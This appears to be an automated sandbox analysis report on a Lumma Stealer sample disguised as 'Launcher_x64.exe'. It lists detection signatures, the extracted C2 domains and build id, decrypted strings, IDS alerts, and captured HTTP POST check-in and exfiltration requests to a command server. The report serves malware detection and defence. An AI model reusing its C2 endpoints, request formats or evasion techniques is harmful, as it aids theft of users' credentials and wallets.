Windows Analysis Report
Launcher_x64.exe

Overview

General Information

Sample name: Launcher_x64.exe
Analysis ID: 1579566
MD5: a467477e289901e8c45912f98fc56cd2
SHA1: 15be8446db31a669ee930bedf992ef558b121f7f
SHA256: 6a8a3c7873b18093245e953808bef419d56ba8d103eab96d276111ef59992c6f
Tags: exe, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Launcher_x64.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
    • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Launcher_x64.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
    • Launcher_x64.exe (PID: 3336 cmdline: "C:\Users\user\Desktop\Launcher_x64.exe" MD5: A467477E289901E8C45912F98FC56CD2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sendypaster.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "steppriflej.xyz", "supporse-comment.cyou", "bellflamre.click"], "Build id": "LPnhqo--swetamubcoyu"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T01:17:36.641324+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 193.143.1.9 | 443 | TCP
2024-12-23T01:18:08.625788+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 193.143.1.9 | 443 | TCP
2024-12-23T01:18:11.813791+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49765 | 23.55.153.106 | 443 | TCP
2024-12-23T01:18:14.333543+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:16.240837+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:18.700426+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49784 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:21.007739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49790 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:23.182176+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49795 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:25.967597+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49801 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:28.978081+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49807 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:32.629372+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49818 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:14.989615+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:17.048776+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:14.989615+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:17.048776+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP
2024-12-23T01:17:04.741497+0100 | 2058212 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 61902 | 1.1.1.1 | 53 | UDP
2024-12-23T01:18:19.696798+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49784 | 172.67.157.254 | 443 | TCP
2024-12-23T01:18:12.592732+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49765 | 23.55.153.106 | 443 | TCP

AV Detection

Source: 00000000.00000002.1731377519.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["sendypaster.xyz", "hosue-billowy.cyou", "smash-boiling.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "steppriflej.xyz", "supporse-comment.cyou", "bellflamre.click"], "Build id": "LPnhqo--swetamubcoyu"}
Source: Launcher_x64.exe | ReversingLabs: Detection: 28%
Source: Launcher_x64.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: pollution-raker.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: hosue-billowy.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: ripe-blade.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: smash-boiling.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: supporse-comment.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: greywe-snotty.cyou
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: steppriflej.xyz
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sendypaster.xyz
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bellflamre.click
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: LPnhqo--swetamubcoyu
Source: C:\Users\user\Desktop\Launcher_x64.exe | Code function: 3_2_004182BC CryptUnprotectData,3_2_004182BC
Source: Launcher_x64.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: Launcher_x64.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Launcher_x64.exe | Code function: 0_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D29126
Source: C:\Users\user\Desktop\Launcher_x64.exe | Code function: 2_2_00D29075 FindFirstFileExW,2_2_00D29075
Source: C:\Users\user\Desktop\Launcher_x64.exe | Code function: 2_2_00D29126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00D29126

Networking

Source: Network traffic | Suricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:61902 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49777 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49784 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49765 -> 23.55.153.106:443
Source: DNS query: sendypaster.xyz
Source: DNS query: steppriflej.xyz
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | ASN Name: BITWEB-ASRU
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 193.143.1.9:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49772 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 193.143.1.9:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49818 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49807 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected:
  GET /profiles/76561199724331900 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 54
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=OMYEZFJQ2JXV
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 18134
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=49MCAZNGRSS936MHK3O
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8797
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=Q57AHR6AEG435T1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20426
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=X3DIBSUGUL5J3X9DJ
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1260
  Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=X0QYLC67LN
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 564957
  Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global traffic DNS traffic detected: DNS query: bellflamre.click
                Source: global traffic DNS traffic detected: DNS query: sendypaster.xyz
                Source: global traffic DNS traffic detected: DNS query: steppriflej.xyz
                Source: global traffic DNS traffic detected: DNS query: greywe-snotty.cyou
                Source: global traffic DNS traffic detected: DNS query: supporse-comment.cyou
                Source: global traffic DNS traffic detected: DNS query: smash-boiling.cyou
                Source: global traffic DNS traffic detected: DNS query: ripe-blade.cyou
                Source: global traffic DNS traffic detected: DNS query: hosue-billowy.cyou
                Source: global traffic DNS traffic detected: DNS query: pollution-raker.cyou
                Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknown HTTP traffic detected:
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: lev-tolstoi.com
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900.
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433824621.000000000101F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Launcher_x64.exe, 00000003.00000003.2458317534.0000000003651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Launcher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Launcher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
